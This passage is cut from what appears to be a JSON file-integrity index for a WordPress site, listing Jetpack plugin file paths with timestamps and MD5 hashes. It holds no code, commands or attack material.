704139,\"h\":\"a698c11eef7171e8e235ca987f866dc3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/infinite-scroll\\/themes\\/twentyeleven.css\":{\"d\":1544704139,\"h\":\"bdd51abb9070c85f15c26c1c06f643c7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/infinite-scroll\\/themes\\/twentyfifteen-rtl.css\":{\"d\":1544704139,\"h\":\"46e4670c5e2eb42058548c8d07780706\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/infinite-scroll\\/themes\\/twentyfifteen.php\":{\"d\":1544704139,\"h\":\"c7f43d4ade035b8ecd02c1afe3de876b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/infinite-scroll\\/themes\\/twentysixteen-rtl.css\":{\"d\":1544704139,\"h\":\"d30b8dce4b2d40d1bf3df38a6a828e0b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/infinite-scroll\\/infinity.css\":{\"d\":1544704139,\"h\":\"8582fd468cb45f7fa72792952be9575f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/infinite-scroll\\/infinity.js\":{\"d\":1544704139,\"h\":\"ff9180809d1ea7e6ac37cb81898ceff1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/infinite-scroll\\/infinity.php\":{\"d\":1544704139,\"h\":\"2224004ac222e76af08f430cb0cb6464\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/minileven\\/theme\\/pub\\/minileven\\/js\\/small-menu.js\":{\"d\":1544704139,\"h\":\"5236bda94f27dcb0d98a133aff2cf358\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/minileven\\/theme\\/pub\\/minileven\\/inc\\/fonts\\/genericons-regular-webfont.eot\":{\"d\":1544704139,\"h\":\"7990d9e8c42928b46be0f4c517b1dfd6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/minileven\\/theme\\/pub\\/minileven\\/inc\\/fonts\\/genericons-regular-webfont.woff\":{\"d\":1544704139,\"h\":\"f7b97039a632d52c4a980958d3a29d2c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/minileven\\/theme\\/pub\\/minileven\\/inc\\/fonts\\/genericons-regular-webfont.ttf\":{\"d\":1544704139,\"h\":\"b9d06b7be470e9160d33e2f3a6e15660\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/minileven\\/theme\\/pub\\/minileven\\/inc\\/custom-header.php\":{\"d\":1544704139,\"h\":\"f793135b6bc40e794e2a6efaeb288d5a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/minileven\\/theme\\/pub\\/minileven\\/inc\\/template-tags.php\":{\"d\":1544704139,\"h\":\"bff4fa526f804b2c1d4f231b3f4c7c11\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/minileven\\/theme\\/pub\\/minileven\\/inc\\/tweaks.php\":{\"d\":1544704139,\"h\":\"3f7bce314a708389080bcf3d30b60d76\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/minileven\\/theme\\/pub\\/minileven\\/comments.php\":{\"d\":1544704139,\"h\":\"37ba0cb6c45f7e4ca59fc260a0e723be\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/minileven\\/theme\\/pub\\/minileven\\/functions.php\":{\"d\":1544704139,\"h\":\"ae93bb613c71d31015eac7ace306f041\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/minileven\\/theme\\/pub\\/minileven\\/style.css\":{\"d\":1544704139,\"h\":\"f3fa892ec42dc55c6909200a2ad8256e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/minileven\\/theme\\/pub\\/minileven\\/rtl.css\":{\"d\":1544704139,\"h\":\"60fb0bb619e84bb3a3fe2fe9d21079da\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/minileven\\/theme\\/pub\\/minileven\\/index.php\":{\"d\":1544704139,\"h\":\"d975ebf2583456080053e03f8071cc8d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/minileven\\/theme\\/pub\\/minileven\\/sidebar.php\":{\"d\":1544704139,\"h\":\"2f8da71d43d01c133b85cb2d76b93ce4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/minileven\\/theme\\/pub\\/minileven\\/content-gallery.php\":{\"d\":1544704139,\"h\":\"5a53875289587a50054e0c7f30f6cf29\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/minileven\\/theme\\/pub\\/minileven\\/header.php\":{\"d\":1544704139,\"h\":\"8dc3185a4a8e1ddc4682b59b365fc585\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/minileven\\/theme\\/pub\\/minileven\\/image.php\":{\"d\":1544704139,\"h\":\"2847f62f74cf1f5e2643d4cb965b78eb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/minileven\\/theme\\/pub\\/minileven\\/searchform.php\":{\"d\":1544704139,\"h\":\"c467c51514f98518ebcfb8d932e2533b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/minileven\\/theme\\/pub\\/minileven\\/page.php\":{\"d\":1544704139,\"h\":\"e0bb1caefa7cad08591eb3c5375b6120\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/minileven\\/theme\\/pub\\/minileven\\/footer.php\":{\"d\":1544704139,\"h\":\"b0d8470b02f9029ec0ea35ac780371dc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/minileven\\/theme\\/pub\\/minileven\\/content.php\":{\"d\":1544704139,\"h\":\"25a9e32ce2eba13d903542b0b976a310\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/minileven\\/minileven.php\":{\"d\":1544704139,\"h\":\"a7c4b3755767d858bf6ffafcaa925070\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/woocommerce-analytics\\/classes\\/wp-woocommerce-analytics-universal.php\":{\"d\":1544704139,\"h\":\"6b42f0a442215920401f3412107ed7d3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/woocommerce-analytics\\/wp-woocommerce-analytics.php\":{\"d\":1544704139,\"h\":\"971ee52cd1a0b119eac7decafd323858\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/theme-tools\\/social-menu\\/social-menu.css\":{\"d\":1544704139,\"h\":\"11b8b9905ffc16f4c4bd81cc9fd5deca\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/theme-tools\\/social-menu\\/icon-functions.php\":{\"d\":1544704139,\"h\":\"db1a226940b058524fbeb922aa8241c2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/theme-tools\\/compat\\/twentyseventeen.php\":{\"d\":1544704139,\"h\":\"cf4ca420c8f55c0e1f0f7eeddd471539\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/theme-tools\\/compat\\/twentyfifteen.css\":{\"d\":1544704139,\"h\":\"8bca66e13f5a42b03f809e4b8e1dd04c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/theme-tools\\/compat\\/twentyfourteen-rtl.css\":{\"d\":1544704139,\"h\":\"9f7f42610ba0f26faaf4026e23c55570\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/theme-tools\\/compat\\/twentysixteen.css\":{\"d\":1544704139,\"h\":\"ec52899ab3024eee3c1b7ec7ee75c41c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/theme-tools\\/compat\\/twentyfourteen.php\":{\"d\":1544704139,\"h\":\"0126d0461157a18dbb745ae125498ee6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/theme-tools\\/compat\\/twentyfourteen.css\":{\"d\":1544704139,\"h\":\"8076c58db88623e27dda5b5fc1bee6f2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/theme-tools\\/compat\\/twentysixteen.php\":{\"d\":1544704139,\"h\":\"c1af03e4a395388fab3cfaf1e5b3ddb5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/theme-tools\\/compat\\/twentynineteen.css\":{\"d\":1544704139,\"h\":\"4291c6e7166d75df6a79cb038a0d6eb8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/theme-tools\\/compat\\/twentyfifteen-rtl.css\":{\"d\":1544704139,\"h\":\"0a45ad249a173f25519ddcc6248ce9fe\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/theme-tools\\/compat\\/twentynineteen.php\":{\"d\":1544704139,\"h\":\"fa4f96f376344bd75f074fc0fb04f546\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/theme-tools\\/compat\\/twentyfifteen.php\":{\"d\":1544704139,\"h\":\"1a268bde5bc6620ddbfd2a28f4697f95\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/theme-tools\\/compat\\/twentysixteen-rtl.css\":{\"d\":1544704139,\"h\":\"bbf21a89f03bea0bf3e713758a7654e8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/theme-tools\\/responsive-videos\\/responsive-videos.min.js\":{\"d\":1544704139,\"h\":\"2e02bc091700b99c18cc1ec4d3cb05e6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/theme-tools\\/responsive-videos\\/responsive-videos.js\":{\"d\":1544704139,\"h\":\"f1df6153c3ba588c4fe1a2939f4d9af7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/theme-tools\\/responsive-videos\\/responsive-videos.css\":{\"d\":1544704139,\"h\":\"4e43cc01fafe401c6166602e6b5f7ae7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/theme-tools\\/site-logo\\/css\\/site-logo-control-rtl.css\":{\"d\":1544704139,\"h\":\"92880287a83a94cdb1a0ba3c31919c06\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/theme-tools\\/site-logo\\/css\\/site-logo-control.css\":{\"d\":1544704139,\"h\":\"4e38d74fdb83226da0b4d4c366148e04\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/theme-tools\\/site-logo\\/css\\/site-logo-control-rtl.min.css\":{\"d\":1544704139,\"h\":\"88be866ff2e8c244843220bdaa0975f6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/theme-tools\\/site-logo\\/css\\/site-logo-control.min.css\":{\"d\":1544704139,\"h\":\"880506c42a8e3e89ff14b5cb86b6a55c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/theme-tools\\/site-logo\\/js\\/site-logo-header-text.js\":{\"d\":1544704139,\"h\":\"c058e272c05fa32b3271ebc4da0f7c5d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/theme-tools\\/site-logo\\/js\\/site-logo-control.min.js\":{\"d\":1544704139,\"h\":\"3ec8ee6d445d95f62106c48b0de3ee55\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/theme-tools\\/site-logo\\/js\\/site-logo-header-text.min.js\":{\"d\":1544704139,\"h\":\"db9ccb95ea4f93180b8ead3a948ca5fc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/theme-tools\\/site-logo\\/js\\/site-logo-control.js\":{\"d\":1544704139,\"h\":\"07a83398fe824e4ccbf1e76d14eb3cad\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/theme-tools\\/site-logo\\/js\\/site-logo.min.js\":{\"d\":1544704139,\"h\":\"bf2528f82d558ff112aa32c2d0aa113e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/theme-tools\\/site-logo\\/js\\/site-logo.js\":{\"d\":1544704139,\"h\":\"ab3cf6d6746cdea008ea383c157ab797\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/theme-tools\\/site-logo\\/inc\\/class-site-logo.php\":{\"d\":1544704139,\"h\":\"d620a99b45dca0a69ce62a7c40d863dd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/theme-tools\\/site-logo\\/inc\\/functions.php\":{\"d\":1544704139,\"h\":\"7b78d521b87c5205618318bbd5fc6f4a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/theme-tools\\/site-logo\\/inc\\/compat.php\":{\"d\":1544704139,\"h\":\"3134b6d5785676af51c4d0296262e941\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/theme-tools\\/site-logo\\/inc\\/class-site-logo-control.php\":{\"d\":1544704139,\"h\":\"0bde137eb3475f96d2b3d1d25d4256ce\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/theme-tools\\/content-options\\/author-bio.php\":{\"d\":1544704139,\"h\":\"6fd270ad739807e0b181903fe144de72\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/theme-tools\\/content-options\\/customizer.php\":{\"d\":1544704139,\"h\":\"369d3a30d685a3dc221ea84f6f99a5d6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/theme-tools\\/content-options\\/blog-display.php\":{\"d\":1544704139,\"h\":\"ed26b9d96b5c9a17f653226b9875a4e2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/theme-tools\\/content-options\\/featured-images.php\":{\"d\":1544704139,\"h\":\"44ed193639f3f32fd1e68e530f91cd66\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/theme-tools\\/content-options\\/featured-images-fallback.php\":{\"d\":1544704139,\"h\":\"853bc02a81d0d2dcabd3ec6a96931eef\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/theme-tools\\/content-options\\/customizer.js\":{\"d\":1544704139,\"h\":\"dc4bdf1c0897c1cdb1b9f317b2176995\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/theme-tools\\/content-options\\/post-details.php\":{\"d\":1544704139,\"h\":\"f8618ccb4d163c18f7ef9202e3d2c093\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/theme-tools\\/js\\/suggest.js\":{\"d\":1544704139,\"h\":\"a962b1c3bece1b22b5b7280117e1025f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/theme-tools\\/site-breadcrumbs.php\":{\"d\":1544704139,\"h\":\"693a6aba8e74f371c2d3ed0d6a8a82c2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/theme-tools\\/random-redirect.php\":{\"d\":1544704139,\"h\":\"51f27967070387e75d9d72cd1371ee9c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/theme-tools\\/social-links.php\":{\"d\":1544704139,\"h\":\"c5d987942cfbe1af978ebdf90c0272f0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/theme-tools\\/featured-content.php\":{\"d\":1544704139,\"h\":\"95e23ef11de3bd6e928e7dda4f2a7ec6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/theme-tools\\/infinite-scroll.php\":{\"d\":1544704139,\"h\":\"22d16873b6805f9c35e7a7a229b03feb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/theme-tools\\/site-logo.php\":{\"d\":1544704139,\"h\":\"499c52ed61a1a0bb194773f2c728606b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/theme-tools\\/content-options.php\":{\"d\":1544704139,\"h\":\"aa0e56c2ac1714d7061491fa3f0423f3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/theme-tools\\/social-menu.php\":{\"d\":1544704139,\"h\":\"7d27871ff7871e358dc69ef9cf173dda\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/theme-tools\\/responsive-videos.php\":{\"d\":1544704139,\"h\":\"ff83e03c06d5258605da742141f2b25c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/sso\\/jetpack-sso-login.min.css\":{\"d\":1544704139,\"h\":\"8692819d1d4c6beadb223358aa4d6cbe\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/sso\\/jetpack-sso-login-rtl.css\":{\"d\":1544704139,\"h\":\"744da17e937c6f13bd9832c96b9eb36c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/sso\\/class.jetpack-sso-helpers.php\":{\"d\":1544704139,\"h\":\"83f0beb97e587b5a786988b5a73aa642\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/sso\\/jetpack-sso-login-rtl.min.css\":{\"d\":1544704139,\"h\":\"d5de736c49fd3a2e608afe7c467b4b51\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/sso\\/class.jetpack-sso-notices.php\":{\"d\":1544704139,\"h\":\"768e74a77a3ac44f0bba55dc63d72394\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/sso\\/jetpack-sso-login.css\":{\"d\":1544704139,\"h\":\"5154fc0cb64eba2a8e39bc4aadaa2d2e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/sso\\/jetpack-sso-login.js\":{\"d\":1544704139,\"h\":\"b60e2c2b91e55039a25060ffd2a17099\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/carousel\\/rtl\\/jetpack-carousel-rtl.css\":{\"d\":1544704139,\"h\":\"86e36b52f90edc305c9cb0ac0438eca4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/carousel\\/jetpack-carousel.php\":{\"d\":1544704139,\"h\":\"fea7a8f53b8c5d2861b627851947f891\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/carousel\\/jetpack-carousel-rtl.css\":{\"d\":1544704139,\"h\":\"8dfafef5d74bcbada74dfabdac2503ef\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/carousel\\/jetpack-carousel.css\":{\"d\":1544704139,\"h\":\"2fbc293218b2a40ee205c795f619438f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/carousel\\/jetpack-carousel-ie8fix.css\":{\"d\":1544704139,\"h\":\"218090dd1f9ade484d724ea8a40b393b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/carousel\\/jetpack-carousel.js\":{\"d\":1544704139,\"h\":\"c9e788138d48c9c1e791ed92b07df112\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/image-widget\\/style.css\":{\"d\":1544704139,\"h\":\"7218d400c59913e23c21930ddb58fa4d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/authors\\/style.css\":{\"d\":1544704139,\"h\":\"84a952f288c23eac97ba066bb9031968\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/google-plus\\/js\\/admin.js\":{\"d\":1544704139,\"h\":\"f69414de063726fe6281a823e996a197\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/contact-info\\/contact-info-admin.js\":{\"d\":1544704139,\"h\":\"fa2a393682c4d81e290539a524ab8222\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/contact-info\\/contact-info-map.css\":{\"d\":1544704139,\"h\":\"ec7729093e984481201cec13e5d7eab0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/social-icons\\/social-icons.css\":{\"d\":1544704139,\"h\":\"7d991f6163c01b8ed8adc9ae946fb3d7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/social-icons\\/social-icons-admin.css\":{\"d\":1544704139,\"h\":\"299ea3f9d33b96f06308ff16e4afa15b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/social-icons\\/social-icons-admin.js\":{\"d\":1544704139,\"h\":\"4ff57fd3645d18e6410d41b63269d2a8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/flickr\\/form.php\":{\"d\":1544704139,\"h\":\"9f9e84ae2846f48c9608a19d657bff8b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/flickr\\/widget.php\":{\"d\":1544704139,\"h\":\"40da380473b0f9c25156d43551b56dec\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/flickr\\/style.css\":{\"d\":1544704139,\"h\":\"6f73b0dcc4bfc500238deceb2f4b5cd4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/my-community\\/style.css\":{\"d\":1544704139,\"h\":\"2eb7ba70f7a5b1a28c7c99881127fc29\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/eu-cookie-law\\/form.php\":{\"d\":1544704139,\"h\":\"41b5c374a0fe3ae3c16af850c2f32d66\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/eu-cookie-law\\/widget.php\":{\"d\":1544704139,\"h\":\"c640585cd147dbd98a6deca7662665f3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/eu-cookie-law\\/style.css\":{\"d\":1544704139,\"h\":\"f37548d8a7a18bed5ef41a6a367864ea\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/eu-cookie-law\\/eu-cookie-law.js\":{\"d\":1544704139,\"h\":\"3a702d8fad848627049059d7c5dfd61c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/eu-cookie-law\\/eu-cookie-law-admin.js\":{\"d\":1544704139,\"h\":\"b004b6c4cdb1beb72896741f036c526a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/milestone\\/style-admin.css\":{\"d\":1544704139,\"h\":\"2cc7a5cd020a3e5d257b7bf9cca43dda\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/milestone\\/milestone.js\":{\"d\":1544704139,\"h\":\"a7420cc04d7df8a5d54e5c340a77adaa\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/milestone\\/admin.js\":{\"d\":1544704139,\"h\":\"a70fd3408f0f3b6ccad88af683d7e55f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/milestone\\/milestone.php\":{\"d\":1544704139,\"h\":\"ee811be66a77a505e1f47bbf13d7afaf\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/migrate-to-core\\/gallery-widget.php\":{\"d\":1544704139,\"h\":\"89294742adcc432c64a89e6a0d2bd9a6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/migrate-to-core\\/image-widget.php\":{\"d\":1544704139,\"h\":\"9023980263ab8d1fcf962eef425fd807\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/gallery\\/css\\/rtl\\/admin-rtl.css\":{\"d\":1544704139,\"h\":\"d10233a3b69486c3f2edf4cd3b294306\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/gallery\\/css\\/admin.min.css\":{\"d\":1544704139,\"h\":\"878ec924f8ec3b0caa8db698d1d2a93d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/gallery\\/css\\/admin-rtl.css\":{\"d\":1544704139,\"h\":\"60c8b49ca03cfae747f58315f7c3afdf\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/gallery\\/css\\/admin-rtl.min.css\":{\"d\":1544704139,\"h\":\"2a67319c0564fa23b0b4a4bd53828fb8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-content\\/plugins\\/jetpack\\/modules\\/widgets\\/gallery\\/css\\/admin.css\":{\"d\":1544704139,\"h\":\"6196620362a47860b14e44898876cfbc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.